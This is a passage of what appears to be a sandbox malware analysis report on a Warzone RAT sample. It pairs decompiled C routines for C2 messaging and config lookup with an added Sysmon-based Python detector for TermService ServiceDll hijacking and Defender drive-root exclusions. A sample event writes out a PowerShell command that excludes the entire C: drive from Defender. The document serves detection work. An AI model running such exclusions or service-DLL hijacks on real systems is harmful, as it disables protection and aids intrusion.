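                                      The two host-level behaviours in the listings above (E0043C1A0/E0043BD37 reading and rewriting TermService's ServiceDll, and E00440D9D spawning powershell to exclude a drive root from Defender) are both visible in endpoint telemetry. The following detection logic is an added example, not Joe Sandbox output and not the sample's code. It assumes Sysmon-style event dictionaries (Event ID 13 for RegistryEvent SetValue with TargetObject/Details, Event ID 1 for ProcessCreate with CommandLine/ParentImage), assumes %SystemRoot% expands to C:\Windows, and runs over constructed sample events embedded below; the Details path in the hijack event and the process paths are invented for the demonstration.

```python
import re

# Assumed value of %SystemRoot%; used only to expand REG_EXPAND_SZ data before comparing.
SYSTEMROOT = r"C:\Windows"

# Key and value the sample opens in E0043C1A0 / E0043BD37, in Sysmon's TargetObject form.
TERMSERVICE_SERVICEDLL = (
    r"HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters\ServiceDll"
)
# What Windows normally stores there (REG_EXPAND_SZ).
EXPECTED_SERVICEDLL = r"%SystemRoot%\System32\termsrv.dll"

# Command prefix built by E00440D9D; the sample appends the first three characters
# of its own module path, i.e. a drive root such as C:\
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-ExclusionPath\s+(?P<path>\"[^\"]*\"|'[^']*'|\S+)",
    re.IGNORECASE,
)
DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")


def normalize_path(value):
    """Strip quotes, expand %SystemRoot% and lower-case for a stable comparison."""
    value = value.strip().strip("\"'")
    value = re.sub(r"%systemroot%", lambda _m: SYSTEMROOT, value, flags=re.IGNORECASE)
    return value.lower()


def check_registry_event(event):
    """Sysmon Event ID 13 (SetValue): flag any ServiceDll that is not termsrv.dll."""
    if event.get("EventID") != 13:
        return None
    if event.get("TargetObject", "").lower() != TERMSERVICE_SERVICEDLL.lower():
        return None
    written = normalize_path(event.get("Details", ""))
    if written == normalize_path(EXPECTED_SERVICEDLL):
        return None
    return {
        "rule": "termservice_servicedll_tamper",
        "severity": "high",
        "image": event.get("Image", ""),
        "value": written,
    }


def check_process_event(event):
    """Sysmon Event ID 1 (ProcessCreate): flag Defender exclusions; a drive root is the worst case."""
    if event.get("EventID") != 1:
        return None
    match = EXCLUSION_RE.search(event.get("CommandLine", ""))
    if match is None:
        return None
    path = match.group("path").strip("\"'")
    return {
        "rule": "defender_exclusion_added",
        "severity": "high" if DRIVE_ROOT_RE.match(path) else "medium",
        "image": event.get("ParentImage", ""),
        "value": path,
    }


def scan(events):
    """Run both checks over a list of event dicts and return the findings in event order."""
    findings = []
    for event in events:
        for check in (check_registry_event, check_process_event):
            finding = check(event)
            if finding is not None:
                findings.append(finding)
    return findings


# Constructed sample events (not from the report); field names follow Sysmon's schema.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": TERMSERVICE_SERVICEDLL,
     "Details": r"%SystemRoot%\System32\termsrv.dll"},                 # default value: benign
    {"EventID": 13, "Image": r"C:\Users\user\Desktop\sample.exe",
     "TargetObject": TERMSERVICE_SERVICEDLL,
     "Details": r"C:\Users\Public\Libraries\svchost.dll"},              # hijacked service DLL
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\Desktop\sample.exe",
     "CommandLine": "powershell Add-MpPreference -ExclusionPath C:\\"},  # whole drive excluded
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-MpPreference"},                       # benign query
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell Add-MpPreference -ExclusionPath "C:\\Tools\\"'},  # narrower exclusion
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Comparing against the default value rather than against a blocklist of known bad paths is deliberate: any ServiceDll other than termsrv.dll means the Remote Desktop service will host a foreign DLL, whatever it is called. The exclusion check grades a bare drive root as high because that is exactly the form E00440D9D produces and it disables Defender scanning for everything on the volume.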

                                      C-Code - Quality: 86%
                                      			// Sends one message to the C2: the marker string "warzone160" and the
                                      			// payload object in _a4 are combined, passed through E00435C32 and handed
                                      			// to WS2_32 ordinal 19 (send) on the socket stored at this+0xc.
                                      			// Decompiler quality is 86%: _t31, _t32 and _t37 are never declared.
                                      			E0043515A(void* __ecx, void* __edx, intOrPtr _a4) {
                                      				char _v12;
                                      				char _v16;            // buffer handed to send()
                                      				char _v24;            // string object holding "warzone160"
                                      				void* _t21;
                                      				void* _t38;           // this pointer
                                      				intOrPtr _t39;        // _a4: payload object, length read from offset 4
                                      				void* _t40;
                                      
                                      				_t37 = __edx;
                                      				_t38 = __ecx;
                                      				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {   // socket != INVALID_SOCKET
                                      					E00432E33( &_v24, __edx, E004331EC( &_v12, "warzone160"));
                                      					_t31 = _v12;
                                      					E00435A2D(_v12);
                                      					_t39 = _a4;
                                      					_t32 = _t40;
                                      					E00432E79(_t40, _t39);          // append payload
                                      					E00432E79(_t40,  &_v24);        // append marker
                                      					_t7 =  &_v16; // 0x434b71
                                      					_t21 = E00435C32(_t7, _t37, _t40, _t32, _v12, _t31);   // produce the wire buffer in _v16
                                      					_t9 =  &_v16; // 0x434b71
                                      					_t10 = _t38 + 0xc; // 0x4419af
                                      					__imp__#19( *_t10,  *_t9,  *((intOrPtr*)(_t39 + 4)), 0);   // send(socket, buf, len, 0)
                                      					E00432E66( &_v16);
                                      					E00432E66( &_v24);
                                      					// the success flag reflects E00435C32 (!= -1), not the result of send()
                                      					return 0 | _t21 != 0xffffffff;
                                      				}
                                      				return 0;                        // no socket: nothing sent
                                      			}
                                      Line addresses: 0x0043515a 0x00435163 0x00435169 0x00435180 0x00435185 0x00435188 0x0043518d 0x00435192 0x00435195 0x004351a2 0x004351a7 0x004351aa 0x004351b7 0x004351ba 0x004351bd 0x004351ce 0x004351d6 0x00000000 0x004351db 0x00000000

                                      APIs
                                      • send.WS2_32(004419AF,qKC,?,00000000), ref: 004351BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: send
                                      • String ID: qKC$warzone160
                                      • API String ID: 2809346765-770954187
                                      • Opcode ID: 3d90c721c39e4b106d19413cab7f9175fbbe919c27dd26a522588c9c5048672d
                                      • Instruction ID: d01bd6d11efa4d175417c8d518e5e757baaacfcf9876ab58bfde7bed2be37f7c
                                      • Opcode Fuzzy Hash: 3d90c721c39e4b106d19413cab7f9175fbbe919c27dd26a522588c9c5048672d
                                      • Instruction Fuzzy Hash: C2019671910004BBDB04FBA5DD43DEFB768AF18324F50522EF122620D1EBB8AF0586A8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			// Looks up what the author calls the settings (presumably the embedded
                                      			// configuration) through E0043FA9F. If nothing is found, a message box
                                      			// reading "Settings not found !" with the caption "DEBUG" is shown: a
                                      			// leftover from the author's debugging that also gives an unconfigured
                                      			// build a visible, easily sandboxed tell.
                                      			E0043FBFC() {
                                      				struct HWND__* _t1;
                                      				void* _t4;
                                      				struct HWND__* _t5;   // return value: the settings pointer, or 0
                                      
                                      				_t1 = E0043FA9F(_t4);
                                      				_t5 = _t1;
                                      				if(_t5 == 0) {
                                      					MessageBoxA(_t1, "Settings not found !", "DEBUG", _t1);   // hWnd and uType are both 0 here
                                      				}
                                      				return _t5;
                                      			}
                                      Line addresses: 0x0043fbfd 0x0043fc02 0x0043fc06 0x0043fc14 0x0043fc14 0x0043fc1d

                                      APIs
                                      • MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0043FC14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message
                                      • String ID: DEBUG$Settings not found !
                                      • API String ID: 2030045667-2996925740
                                      • Opcode ID: b78981e10081698370fd0c01f3edf2b5764fd21916285734f149673e49dce135
                                      • Instruction ID: a628e4584257f69c95a8ffbe8373ac5bc64d1e290ac620c07272c733416a25f9
                                      • Opcode Fuzzy Hash: b78981e10081698370fd0c01f3edf2b5764fd21916285734f149673e49dce135
                                      • Instruction Fuzzy Hash: D4C08C22EC0A322B152232A43D0AA6B09086A56B553011172BC00E7242CA8CCC0241DC
                                      Uniqueness

                                      Uniqueness Score: 100.00%